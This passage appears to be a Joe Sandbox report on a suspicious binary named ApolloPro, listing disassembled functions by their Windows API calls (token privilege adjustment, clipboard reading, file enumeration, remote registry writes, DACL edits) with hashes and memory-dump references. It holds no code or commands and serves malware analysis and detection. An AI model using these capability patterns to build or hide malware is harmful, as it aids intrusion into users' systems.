                                                                                              • SendMessageW.USER32 ref: 006BD703
                                                                                              • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 006BD724
                                                                                              • SendMessageW.USER32(?,0000110B,00000009,?), ref: 006BD733
                                                                                              • GetCursorPos.USER32(?), ref: 006BD753
                                                                                              • ScreenToClient.USER32(?,?), ref: 006BD760
                                                                                              • GetParent.USER32(?), ref: 006BD780
                                                                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 006BD7E9
                                                                                              • SendMessageW.USER32 ref: 006BD81A
                                                                                              • ClientToScreen.USER32(?,?), ref: 006BD878
                                                                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 006BD8A8
                                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 006BD8D2
                                                                                              • SendMessageW.USER32 ref: 006BD8F5
                                                                                              • ClientToScreen.USER32(?,?), ref: 006BD947
                                                                                              • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 006BD97B
                                                                                                • Part of subcall function 006329AB: GetWindowLongW.USER32(?,000000EB), ref: 006329BC
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 006BDA17
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                              • String ID: @GUI_DRAGID$F
                                                                                              • API String ID: 3977979337-4164748364
                                                                                              • Opcode ID: 6c59736951e9ac04c972658cfce8b6509d76795e502655337f6f6f3097c26d84
                                                                                              • Instruction ID: f8973d7f1b7296c71ba380608232dcba75e7bac76028ca0aac96903c1c71b304
                                                                                              • Opcode Fuzzy Hash: 6c59736951e9ac04c972658cfce8b6509d76795e502655337f6f6f3097c26d84
                                                                                              • Instruction Fuzzy Hash: 31428BB0205241EFD724DF28C844FEABBE6FF49350F140619F6958B3A1E771A895CB92
                                                                                              Function 00688F2E Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00689399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 006893E3
                                                                                                • Part of subcall function 00689399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00689410
                                                                                                • Part of subcall function 00689399: GetLastError.KERNEL32 ref: 0068941D
                                                                                              • _memset.LIBCMT ref: 00688F71
                                                                                              • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00688FC3
                                                                                              • CloseHandle.KERNEL32(?), ref: 00688FD4
                                                                                              • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00688FEB
                                                                                              • GetProcessWindowStation.USER32 ref: 00689004
                                                                                              • SetProcessWindowStation.USER32(00000000), ref: 0068900E
                                                                                              • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00689028
                                                                                                • Part of subcall function 00688DE9: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00688F27), ref: 00688DFE
                                                                                                • Part of subcall function 00688DE9: CloseHandle.KERNEL32(?,?,00688F27), ref: 00688E10
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                              • String ID: $default$winsta0
                                                                                              • API String ID: 2063423040-1027155976
                                                                                              • Opcode ID: e00d11ae145e26512ef13691f51d4de90c80707f867da1e8b47dd92b22c5468e
                                                                                              • Instruction ID: a7162a9903a38be6484cb111867c8864b444c186e41d820a586e8c0a2ec60d33
                                                                                              • Opcode Fuzzy Hash: e00d11ae145e26512ef13691f51d4de90c80707f867da1e8b47dd92b22c5468e
                                                                                              • Instruction Fuzzy Hash: 1681597190420AFFEF11AFA4CC49EFE7B7AAF04304F184219F954A6261DB318E15DB20
                                                                                              Function 006A4632 Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • OpenClipboard.USER32(006C0980), ref: 006A465C
                                                                                              • IsClipboardFormatAvailable.USER32(0000000D), ref: 006A466A
                                                                                              • GetClipboardData.USER32(0000000D), ref: 006A4672
                                                                                              • CloseClipboard.USER32 ref: 006A467E
                                                                                              • GlobalLock.KERNEL32(00000000), ref: 006A469A
                                                                                              • CloseClipboard.USER32 ref: 006A46A4
                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 006A46B9
                                                                                              • IsClipboardFormatAvailable.USER32(00000001), ref: 006A46C6
                                                                                              • GetClipboardData.USER32(00000001), ref: 006A46CE
                                                                                              • GlobalLock.KERNEL32(00000000), ref: 006A46DB
                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 006A470F
                                                                                              • CloseClipboard.USER32 ref: 006A481F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                                              • String ID:
                                                                                              • API String ID: 3222323430-0
                                                                                              • Opcode ID: 49b831ce670b16434491f0a51c4bc8ed8621ecdffa479597c78f7239dbdd9d32
                                                                                              • Instruction ID: 595682c5167e20999f64df16d6fb9401aff97d372c2422925c4fbd4d3eeffb18
                                                                                              • Opcode Fuzzy Hash: 49b831ce670b16434491f0a51c4bc8ed8621ecdffa479597c78f7239dbdd9d32
                                                                                              • Instruction Fuzzy Hash: 7651AB31204201ABE300FF24EC89F7E77AAAFC6B01F10552DF656962A1DFB4DD058B66
                                                                                              Function 0069F5D8 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 119fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 0069F5F9
                                                                                              • _wcscmp.LIBCMT ref: 0069F60E
                                                                                              • _wcscmp.LIBCMT ref: 0069F625
                                                                                              • GetFileAttributesW.KERNEL32(?), ref: 0069F637
                                                                                              • SetFileAttributesW.KERNEL32(?,?), ref: 0069F651
                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 0069F669
                                                                                              • FindClose.KERNEL32(00000000), ref: 0069F674
                                                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 0069F690
                                                                                              • _wcscmp.LIBCMT ref: 0069F6B7
                                                                                              • _wcscmp.LIBCMT ref: 0069F6CE
                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0069F6E0
                                                                                              • SetCurrentDirectoryW.KERNEL32(006EB578), ref: 0069F6FE
                                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 0069F708
                                                                                              • FindClose.KERNEL32(00000000), ref: 0069F715
                                                                                              • FindClose.KERNEL32(00000000), ref: 0069F727
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                              • String ID: *.*$Si
                                                                                              • API String ID: 1803514871-2960267604
                                                                                              • Opcode ID: 26b812378e207cd783b25acf7e2d0738c26191beffab6c7871d3ead01428e19d
                                                                                              • Instruction ID: 09d92c74f827624230da2696e2a55bbca04d8983051f85755942075f97f51cc0
                                                                                              • Opcode Fuzzy Hash: 26b812378e207cd783b25acf7e2d0738c26191beffab6c7871d3ead01428e19d
                                                                                              • Instruction Fuzzy Hash: B531F371A01319AAEF109FB4EC49EEE73AEEF09321F150165F804D22A0DB74CE44CA64
                                                                                              Function 0069CD9F Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 0069CDD0
                                                                                              • FindClose.KERNEL32(00000000), ref: 0069CE24
                                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0069CE49
                                                                                              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0069CE60
                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0069CE87
                                                                                              • __swprintf.LIBCMT ref: 0069CED3
                                                                                              • __swprintf.LIBCMT ref: 0069CF16
                                                                                                • Part of subcall function 00641A36: _memmove.LIBCMT ref: 00641A77
                                                                                              • __swprintf.LIBCMT ref: 0069CF6A
                                                                                                • Part of subcall function 006538C8: __woutput_l.LIBCMT ref: 00653921
                                                                                              • __swprintf.LIBCMT ref: 0069CFB8
                                                                                                • Part of subcall function 006538C8: __flsbuf.LIBCMT ref: 00653943
                                                                                                • Part of subcall function 006538C8: __flsbuf.LIBCMT ref: 0065395B
                                                                                              • __swprintf.LIBCMT ref: 0069D007
                                                                                              • __swprintf.LIBCMT ref: 0069D056
                                                                                              • __swprintf.LIBCMT ref: 0069D0A5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                                                              • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                              • API String ID: 3953360268-2428617273
                                                                                              • Opcode ID: 7fc50c78fd389ec7b41c415097476e8427bd52653e8268109ae3484ba2ed0a43
                                                                                              • Instruction ID: 5dac62b5b0a34c9635f4dfacc7a54802332e50c28bcf0593a1d65e11bb6d1d06
                                                                                              • Opcode Fuzzy Hash: 7fc50c78fd389ec7b41c415097476e8427bd52653e8268109ae3484ba2ed0a43
                                                                                              • Instruction Fuzzy Hash: E8A16DB1408304ABD754EFA4D885DAFB7EEEF95700F40091DF58587291EB34EA48CBA6
                                                                                              Function 006B0EB7 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 006B0FB3
                                                                                              • RegCreateKeyExW.ADVAPI32(?,?,00000000,006C0980,00000000,?,00000000,?,?), ref: 006B1021
                                                                                              • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 006B1069
                                                                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 006B10F2
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 006B1412
                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 006B141F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Close$ConnectCreateRegistryValue
                                                                                              • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                              • API String ID: 536824911-966354055
                                                                                              • Opcode ID: 4cc9e65b1d688230c09c81e85a8cfcbfd729dbfdb088726b984dd6b45afeb806
                                                                                              • Instruction ID: 3a797cda5a229b78d7de2cc4c4c8015032831aa6c8d6e2b04b8ec81b66d4399e
                                                                                              • Opcode Fuzzy Hash: 4cc9e65b1d688230c09c81e85a8cfcbfd729dbfdb088726b984dd6b45afeb806
                                                                                              • Instruction Fuzzy Hash: C4027A71600611AFCB54EF25C895E6AB7E6FF89710F04895CF88A9B362CB30ED41CB85
                                                                                              Function 0069F735 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 112fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 0069F756
                                                                                              • _wcscmp.LIBCMT ref: 0069F76B
                                                                                              • _wcscmp.LIBCMT ref: 0069F782
                                                                                                • Part of subcall function 00694875: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00694890
                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 0069F7B1
                                                                                              • FindClose.KERNEL32(00000000), ref: 0069F7BC
                                                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 0069F7D8
                                                                                              • _wcscmp.LIBCMT ref: 0069F7FF
                                                                                              • _wcscmp.LIBCMT ref: 0069F816
                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0069F828
                                                                                              • SetCurrentDirectoryW.KERNEL32(006EB578), ref: 0069F846
                                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 0069F850
                                                                                              • FindClose.KERNEL32(00000000), ref: 0069F85D
                                                                                              • FindClose.KERNEL32(00000000), ref: 0069F86F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                              • String ID: *.*$ji
                                                                                              • API String ID: 1824444939-474203043
                                                                                              • Opcode ID: 62018e311f205439834fcef22d31eaffdc5a3b056182f0d3b67e399b68c6e6b7
                                                                                              • Instruction ID: 91184324ab209cf88fca898b5f93d825714ddf9966f57437b08d919a491e53dc
                                                                                              • Opcode Fuzzy Hash: 62018e311f205439834fcef22d31eaffdc5a3b056182f0d3b67e399b68c6e6b7
                                                                                              • Instruction Fuzzy Hash: C131F67190125AAAEF509FB4EC48EEE77BEDF09321F110165F804E36A0DB70CE458A64
                                                                                              Function 006888CD Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00688E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00688E3C
                                                                                                • Part of subcall function 00688E20: GetLastError.KERNEL32(?,00688900,?,?,?), ref: 00688E46
                                                                                                • Part of subcall function 00688E20: GetProcessHeap.KERNEL32(00000008,?,?,00688900,?,?,?), ref: 00688E55
                                                                                                • Part of subcall function 00688E20: HeapAlloc.KERNEL32(00000000,?,00688900,?,?,?), ref: 00688E5C
                                                                                                • Part of subcall function 00688E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00688E73
                                                                                                • Part of subcall function 00688EBD: GetProcessHeap.KERNEL32(00000008,00688916,00000000,00000000,?,00688916,?), ref: 00688EC9
                                                                                                • Part of subcall function 00688EBD: HeapAlloc.KERNEL32(00000000,?,00688916,?), ref: 00688ED0
                                                                                                • Part of subcall function 00688EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00688916,?), ref: 00688EE1
                                                                                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00688931
                                                                                              • _memset.LIBCMT ref: 00688946
                                                                                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00688965
                                                                                              • GetLengthSid.ADVAPI32(?), ref: 00688976
                                                                                              • GetAce.ADVAPI32(?,00000000,?), ref: 006889B3
                                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 006889CF
                                                                                              • GetLengthSid.ADVAPI32(?), ref: 006889EC
                                                                                              • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 006889FB
                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00688A02
                                                                                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00688A23
                                                                                              • CopySid.ADVAPI32(00000000), ref: 00688A2A
                                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00688A5B
                                                                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00688A81
                                                                                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00688A95
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                              • String ID:
                                                                                              • API String ID: 3996160137-0
                                                                                              • Opcode ID: ca1057b130313c1d0bbcc12b5f01fd4d7dc5922c4a7ce2d1946f8162f9c7338e
                                                                                              • Instruction ID: dafc0525ad2a37c8a9a031965d04bd0cbff24c0bf75b309ae9ae549941779b62
                                                                                              • Opcode Fuzzy Hash: ca1057b130313c1d0bbcc12b5f01fd4d7dc5922c4a7ce2d1946f8162f9c7338e
                                                                                              • Instruction Fuzzy Hash: 82611775A00209FFDF04EFA5DC45EEEBB7ABF44304F44826AE915A7290DB359A05CB60
                                                                                              Function 006B0A3A Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 006B147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,006B040D,?,?), ref: 006B1491
                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 006B0B0C
                                                                                                • Part of subcall function 00634D37: __itow.LIBCMT ref: 00634D62
                                                                                                • Part of subcall function 00634D37: __swprintf.LIBCMT ref: 00634DAC
                                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 006B0BAB
                                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 006B0C43
                                                                                              • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 006B0E82
                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 006B0E8F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                              • String ID:
                                                                                              • API String ID: 1240663315-0
                                                                                              • Opcode ID: 2ff0c9536257dbdf4ad70743e14d3e977518fb7847b5a406a7b551a94fbd96bb
                                                                                              • Instruction ID: aa83fb539999d0a754adb11ff4226fadc66f6e6f37ddee76367728fcc0bd72f5
                                                                                              • Opcode Fuzzy Hash: 2ff0c9536257dbdf4ad70743e14d3e977518fb7847b5a406a7b551a94fbd96bb
                                                                                              • Instruction Fuzzy Hash: 4EE16C71604210AFDB54DF24C895E6BBBEAEF89314F04896DF849DB2A1DB30EC41CB55
                                                                                              Function 0069443D Relevance: 15.1, APIs: 10, Instructions: 108windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __swprintf.LIBCMT ref: 00694451
                                                                                              • __swprintf.LIBCMT ref: 0069445E
                                                                                                • Part of subcall function 006538C8: __woutput_l.LIBCMT ref: 00653921
                                                                                              • FindResourceW.KERNEL32(?,?,0000000E), ref: 00694488
                                                                                              • LoadResource.KERNEL32(?,00000000), ref: 00694494
                                                                                              • LockResource.KERNEL32(00000000), ref: 006944A1
                                                                                              • FindResourceW.KERNEL32(?,?,00000003), ref: 006944C1
                                                                                              • LoadResource.KERNEL32(?,00000000), ref: 006944D3
                                                                                              • SizeofResource.KERNEL32(?,00000000), ref: 006944E2
                                                                                              • LockResource.KERNEL32(?), ref: 006944EE
                                                                                              • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 0069454F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                                              • String ID:
                                                                                              • API String ID: 1433390588-0
                                                                                              • Opcode ID: e496ee3c18de49a63cf8b087b7f269a8ff18d454601a773cb9c3a1a6ba8ca9d6
                                                                                              • Instruction ID: 923b0e99c54f089537c14760f28a2e4116e15a13edcc546c8aec78790e1156b6
                                                                                              • Opcode Fuzzy Hash: e496ee3c18de49a63cf8b087b7f269a8ff18d454601a773cb9c3a1a6ba8ca9d6
                                                                                              • Instruction Fuzzy Hash: E3316E7150121AAFDF119FA0ED48EBB7BAEEF08341F004415F915D7650EB34DA22CB60
                                                                                              Function 006A4830 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                              • String ID:
                                                                                              • API String ID: 1737998785-0
                                                                                              • Opcode ID: ab09be5cb5b6c5e219973cd94dcd7c8a53be87267c0c05be4b99a6488c3e97ae
                                                                                              • Instruction ID: 63130e11166b99643ae927b19a1ead680ff482df77baff279efeb4bc07eddbc1
                                                                                              • Opcode Fuzzy Hash: ab09be5cb5b6c5e219973cd94dcd7c8a53be87267c0c05be4b99a6488c3e97ae
                                                                                              • Instruction Fuzzy Hash: D0218B31201210DFEB41AF25EC09F7EB7AAEF84721F108019F9469B2A1CB74AD118B98
                                                                                              Function 00693CE2 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00650284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00642A58,?,00008000), ref: 006502A4
                                                                                                • Part of subcall function 00694FEC: GetFileAttributesW.KERNEL32(?,00693BFE), ref: 00694FED
